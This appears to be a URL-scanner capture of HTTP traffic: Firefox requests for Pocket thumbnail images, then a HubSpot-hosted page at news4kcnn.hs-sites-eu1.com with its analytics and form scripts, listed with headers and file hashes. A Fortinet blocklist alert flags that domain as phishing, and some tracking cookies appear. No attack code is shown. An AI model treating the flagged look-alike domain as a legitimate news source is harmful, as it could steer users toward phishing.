                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6f033f00-b116-4419-9d21-3aed9c73ea2e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8764
x-amzn-requestid: 48f44e2c-3d91-46cf-8701-3c5028e0a86d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YE-gLG4_oAMFn-A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63184467-46abfc77601bd90f39a2c840;Sampled=0
x-amzn-remapped-date: Wed, 07 Sep 2022 07:12:39 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: tE5GZDktiELwfFRC_IEAqoat6cN7vb_TA17d-zRO6saTLEGRqB94Pw==
via: 1.1 95b0ac620fa3a80ee590ecf1cda1c698.cloudfront.net (CloudFront), 1.1 591683988172c7980c4ebb318cbf18a8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 13:36:51 GMT
age: 19046
etag: "28d47359e70789115b2954b6c94711bb783b3c8c"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8764
Md5:    9d97e56f75165efcc71ae54952ded405
Sha1:   28d47359e70789115b2954b6c94711bb783b3c8c
Sha256: 564eac2ae99724e5f43aa1ae0afe4dec03697f888f51774e70e1b9c273c2d9d6
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b4d822c-5153-4c55-bcb3-aa6ee72e3b62.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6078
x-amzn-requestid: e09c099f-5a2d-49d7-b6ab-e16f09c28bd0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YavJEEM5IAMFreQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f8a0-0fbb7b3d0cd6fbfa04f5a5d2;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:39:44 GMT
x-amz-cf-pop: SEA73-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Ur-HTN2DS8b3ojSQldJOZi6YW2wtCwRfbGqxg49ZUJ_00hC_rFxYEw==
via: 1.1 9b21fd56256eda6d1379e32829c4c446.cloudfront.net (CloudFront), 1.1 5397b304713f6301c7c94ac084b6ed08.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:05:07 GMT
age: 74950
etag: "33d0dcadaa42179b2eae914c8ad16c9c088afbc9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6078
Md5:    f2157f7cfbdeb607f28ae51eb090f2c3
Sha1:   33d0dcadaa42179b2eae914c8ad16c9c088afbc9
Sha256: 135cd89c2c82f0f5e53d2612d5eac868c175b28a567a07e63a2073942e36a066
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F34a3d36b-806f-4fea-a370-b26c1e8473d0.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5988
x-amzn-requestid: a0d81c7a-14e3-443d-8fb7-19241f06d3c4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yaux0H77IAMF2_g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f80b-0fe6fbbe75e891b925f88dc2;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:37:15 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 3PbHWkNMa0XkuY_FcTO22i9YwMdqlJPCho7FlBwdbuUnbWrOv0w5Hg==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 e66162aafd55b64ba1478ff7105150fa.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:59:03 GMT
age: 75314
etag: "e5b46c3ca439a09950290cada1af5e27cede10f2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5988
Md5:    f5befd5bb8e6d5dad2465be69d5a33e4
Sha1:   e5b46c3ca439a09950290cada1af5e27cede10f2
Sha256: 4dc0a3373fb4c1830c4e2420dddbcbe8dceecf10e969cbe8d02368e41207832c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff2b71bb0-fd92-43d0-8cd0-b426d0b88ee8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 15547
x-amzn-requestid: a78f7d90-84c3-4198-88bf-1d722c37f09f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yauv4EUDoAMF13A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f7ff-49535e5525606250306488ba;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:37:03 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: CWzE6n2U7hSFcSIHX5z76DPIid9pvbOqM6ikOlegBxzbuRThMeLKZA==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 1481cc55c02c3a782ad420b6bac2cb32.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:46:14 GMT
etag: "366b2090d409d694b72b4b4131df46dd65d69c5a"
age: 76083
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   15547
Md5:    56811a1a20a467464e1f3da171ef8b14
Sha1:   366b2090d409d694b72b4b4131df46dd65d69c5a
Sha256: 4c208fb88884166adf4ecc5882f75948b4a87d85c76ad6e7137e8edbd125c996
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8cb650f7-1b0f-4a3d-898f-97b846afe9db.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10138
x-amzn-requestid: bdf798d9-6729-4363-a900-f32c4041d0c7
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YU5qsGZ-oAMFQ1Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631ea311-7b146c0620a83d5c00446f87;Sampled=0
x-amzn-remapped-date: Mon, 12 Sep 2022 03:10:09 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: OM9K72ukk0cuyR1ZcV5xWXnEd8U9OgeQi7bkCe0Pzn3BfdLMvSdSXg==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 03:09:32 GMT
age: 56685
etag: "0617d2e513097ca415a1d07cd39b1cb64d832ecf"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10138
Md5:    0789404fdbe3613d465d8fa89a63d7b8
Sha1:   0617d2e513097ca415a1d07cd39b1cb64d832ecf
Sha256: 80e55e383f354113c3694bbcc00fd1c544a97079bd3c462f1b90e952c0634bac
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F16b1b829-b672-479c-964a-2f636f65f91e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 14151
x-amzn-requestid: d5bc9be4-af3a-40fd-bfc9-1ac4769d2d3c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yauv4GhboAMF2dA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f7ff-375df72d2d67582635b9e4ae;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:37:03 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: CZRpgjU_AxNYoyeSTOwhJhONl2DS4pvCLJ62RgAFp0flw-kPz3GkpQ==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:06:54 GMT
etag: "a3e706d6309e4a9d7b293f2b9255f1550ba5e9b7"
age: 74843
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   14151
Md5:    fef8234ab83f6f8f8b29665f592cbc9f
Sha1:   a3e706d6309e4a9d7b293f2b9255f1550ba5e9b7
Sha256: 569c8c9736026fc310e148d4d74081e96a86245baaa1f784280d44a1cbd25ed0
                                        
                                            POST /_hcms/perf HTTP/1.1 
Host: news4kcnn.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 740
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Cookie: __hstc=205882892.273058360422436e2d4b8a10fc5ce748.1663181642943.1663181642943.1663181642943.1; hubspotutk=273058360422436e2d4b8a10fc5ce748; __hssrc=1; __hssc=205882892.1.1663181642943

                                         
                                         172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Date: Wed, 14 Sep 2022 18:54:20 GMT
Content-Length: 2
Connection: keep-alive
CF-Ray: 74ab54a07adf0afa-OSL
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
X-HubSpot-Correlation-Id: 1451bb5b-6de3-42b6-bc33-d846a719305e
X-Robots-Tag: none
X-Trace: 2B5E83F9C78C984906E575122F2449D6BC2C03A133000000000000000000
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    e0aa021e21dddbd6d8cecec71e9cf564
Sha1:   9ce3bd4224c8c1780db56b4125ecf3f24bf748b7
Sha256: 565339bc4d33d72817b583024112eb7f5cdf3e5eef0252d6ec1b9c9a94e12bb3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 62dc260e32d7b9197a4511447f6a264a.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: gFbXK5bvIT-64gLggHKl6jfIrLLqDkz4GKbT0mrWX8m_wFhkZZ7HzA==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74a953939d2a7377-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 21011
server: cloudflare
cf-ray: 74ab54884a1c0d32-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /analytics/1663181400000/26246936.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
x-amz-id-2: AkXuTOlv4OZKCj15k4eSlfx+ApqkKeYc00FIyEfjkvFua3SezDX9wpx49DHxvHFKXgl1jSfkOiY=
x-amz-request-id: 8DTE6V58BD3YDPZN
last-modified: Wed, 14 Sep 2022 11:45:11 GMT
etag: W/"961ca446759a9849f5f31f953b62814c"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Wed, 14 Sep 2022 18:59:16 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74ab548b4d370d4e-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /collected-forms/v1/config/json?portalId=26246936&utk= HTTP/1.1 
Host: forms-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.193.34
HTTP/2 200 OK
content-type: application/json;charset=utf-8
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
vary: Accept-Encoding
x-hubspot-correlation-id: 7b8bf744-595e-4127-9466-75a48338aef3
access-control-allow-credentials: false
access-control-allow-origin: http://news4kcnn.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: *
access-control-max-age: 180
x-robots-tag: none
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=tTdd.UxA1qpMJ2_hW7kBZN0WJ4IaIQmNCOe3R6xUOI8-1663181656-0-AaGWcNxw8wTwpu2/QXc61TVvoOc/U93IeK3Yc51i8HMf7WiR5XIMq9tkiDBpm+fdivPN0SFRswHvpkfbO/Ykb1M=; path=/; expires=Wed, 14-Sep-22 19:24:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6i7kvNJywarug0Nyu2W1jxIoKHxQ5zaw3PDi%2FCyGJEexBKWpYXWUwCX3EijHrtkUfmhe8%2FXE%2BrEtS8BNrx4X%2BBk2zw1qX0xCAglm%2Btxmbz1%2BycLpaAJvpN%2BkbGTP5E73Lzt3H9wD6w%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab548a1aa00d42-ARN
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.9.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1739613
expires: Thu, 14 Sep 2023 18:54:16 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tiQnISxID13cO5yoTYUqI%2Bz1tO7EnX439ecg9FG0FqUqaiu7abzcPjsz6l8Z9HlelB2jo800FFzhofEZBkFyqCctSUs1T8QZZ5Fz2WHmMy811IWgBxvYh5hJfRwcW345Hzds1v%2Fxoy4%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab548758e00afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.9.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 85104
expires: Thu, 14 Sep 2023 18:54:16 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FE%2BCbPlCq%2FkWWMK0z1tgN2M8zBdNLT6aalrS228bfnD532cQ37nOK960NrHGp8wwf1NRS2pRp5MLksP5zl4l9WvAp5%2BoL96afFNzTbooMadaV13VnOxmOldR9a8bXEZA1vLSxTxW7DA%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab548758d80afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /cms-free-branding-lib/static-1.111/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.9.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 12 Jul 2022 20:24:02 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: UeMu8WOMDUthADLLgqZZZU3H9mISgOsX
etag: W/"29a15a515ef5e383fba2c6d65b1de499"
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 60d22b5ab79521d827fcdd546c7710d4.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: -KuTJcFYSjo9F4GglqsT_-vXHaNSY_Z_DAQD2EJCoeEMmw1nPJ3ipg==
cf-cache-status: HIT
age: 1456298
expires: Thu, 14 Sep 2023 18:54:16 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xY0YwgCPgYspi44Jr1MSEhkW28Pae3qkAxEM4KZ2BIpQw3gSv8hGBlkWYI09OGUelhWxr8QLfSuiJbUenThfczDpcg%2BEu8kLn4mg1R8lBBdx1vgIntPtj7FEiDaYcaPYyPdIYtqrc5M%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab548748cc0afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---